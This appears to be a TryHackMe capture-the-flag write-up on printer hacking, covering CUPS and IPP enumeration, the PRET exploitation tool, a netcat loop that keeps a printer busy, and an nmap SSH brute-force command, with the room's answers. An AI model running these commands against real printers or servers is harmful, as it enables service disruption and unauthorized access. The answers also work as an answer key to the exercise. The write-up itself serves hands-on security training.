Date: 13, December, 2020
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
- CUPS Server (Common UNIX Printing System)
- IPP (Internet Printing Protocol)
- PRET - Printer Exploitation
- Printer Security Testing Cheat Sheet
- Locating Printers
python pret.pynmap -p 631 <IP_RANGE>
- Exploiting
- Three options in PRET:
- PS (PostScript)
- PJL (Printer Job Language)
- PCL (Printer Command Language)
- Try out all the three languages, to check if the language will be understood by the printer
python pret.py laserjet.lan ps python pret.py {IP} pjl python pret.py /dev/usb/lp0 pcl - Once you get a shell-like output, type
helpto see the different commands available.
- Three options in PRET:
- Answer: 631
- Impact
- An open IPP port can expose a lot of sensitive information such as printer name, location, model, firmware version, or even printer wifi SSID.
- Answer:
while true; do nc printer 9100; done - Explanation:
- Replace
printerwith<PRINTER_IP> - Since it is an infinite loop, the printer will remain busy.
- Replace
Review the cheat sheet provided in the task reading above. What attack are printers often vulnerable to which involves sending more and more information until a pre-allocated buffer size is surpassed?
- Answer: Buffer Overflow
-
Use any of the following
- Metasploit
- Hydra
- Nmap
-
Using nmap:
nmap <MACHINE_IP> -p 22 --script ssh-brute --script-arg userdb=user.txt- Since we know the username,
user.txtmust contain onlyprinter
- Answer: Skidy's basement
- Steps to Reproduce: Visit
http://<MACHINE_IP>:631/printers/
- Answer: 1k
- Steps to Reproduce:
- Visit
http://<MACHINE_IP>:631/printers/Fox_Printer - Select
Print Test Pageoption from the Drop-down box. - The jobs will be listed at the bottom of the page.
- Check the
sizecolumn in that table.
- Visit
